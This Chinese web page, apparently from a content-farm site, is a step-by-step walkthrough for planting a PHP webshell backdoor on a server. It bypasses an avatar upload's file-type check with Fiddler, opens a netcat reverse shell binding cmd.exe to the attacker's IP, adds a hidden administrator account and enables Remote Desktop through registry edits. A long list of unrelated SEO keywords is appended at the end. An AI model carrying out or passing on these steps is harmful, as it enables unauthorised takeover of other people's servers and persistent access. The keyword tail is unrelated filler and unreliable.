千家信息网

webshell后门上传流程

发表于:2024-10-11 作者:千家信息网编辑
千家信息网最后更新 2024年10月11日,1、将webshell.php的后缀名改成jpg等图片格式,即web.jpg。2、打开相应网址,注册好账号后选择上传头像将web.jpg上传期间运行fiddler并设置断点,切换到raw界面,等到其提
千家信息网最后更新 2024年10月11日webshell后门上传流程

1、将webshell.php的后缀名改成jpg等图片格式,即web.jpg。

2、打开相应网址,注册好账号后选择上传头像将web.jpg上传期间运行fiddler并设置断点,切换到raw界面,等到其提示相应请求代码后,将其代码段中第二个含有上传图片名称的代码改成web.php,之后继续响应请求。

3、此时已经成功把后门程序上传,将服务器反馈的代码中含有路径的部分复制粘贴到网站URL后面(注意将?php覆盖)刷新网页。

4、然后输入相应密码进入控制服务器端,将本机的nc.exe(netcut)上载到其C盘根目录下。

5、而后在自己本机打开cmd命令窗口找到nc.exe所在的目录并运行

6、这时已经进入nc.exe,在Cmd line:后输入nc -vv -l -p 8080进行监听

7、在控制服务器端选择Execute Command窗口,输入'c:\nc.exe -vv [自身ip 端口] -e cmd.exe'启动nc(绑定服务器端主机的cmd.exe在本机的相应端口)

8、然后就可以添加自己的账号作为管理员了,具体操作是:

(1) net user hacker 3836546 /add (添加用户)

(2) net user localgroup administrators test /add (添加到管理员组)

9、写入注册表:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

(win2k,winxp,win2k3下开启远程桌面,不用重启)

10、有时还需要修改3389端口

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Wds\Repwd\Tds\Tcp]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set\Control\TenninalServer\WinStations\RDP-Tcp]

11、完成上述流程后,你就可以进入服务器端的主机进行操作


服务器 服务 代码 端口 本机 输入 主机 图片 目录 管理员 账号 控制 管理 运行 选择 后门 流程 成功 不用 名称 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 乱斗西游服务器连不上 电脑上数据库是干什么用的 java计算机编程软件开发 网络安全人人有责艺术字 搞软件开发需要什么学历人才 连云港思文网络技术有限公司 服务器最多能计算多大数据 网络安全图片大全儿童画 工程力学和软件开发哪个好 数据库怎么停止查询 帮公司搭建服务器 网络安全法的国际背景 比亚迪汉服务器错误 路南区企业网络技术服务至上 海南省网络安全协会会长 云南国家网络安全宣传周 财经城市数据库 要树立正确的什么观加强网络安全 智慧校园管理服务器 cf端游最好用的服务器 济宁口碑网络技术有限公司 台湾的网络安全企业 搞软件开发需要什么学历人才 公司软件开发部门叫什么 2020江苏网络安全 新买的相机数据库文件错误 ibmx3400服务器的主板 网络安全审计系统技术规格 软件开发三方协议范本 数据库有几百万条数据
0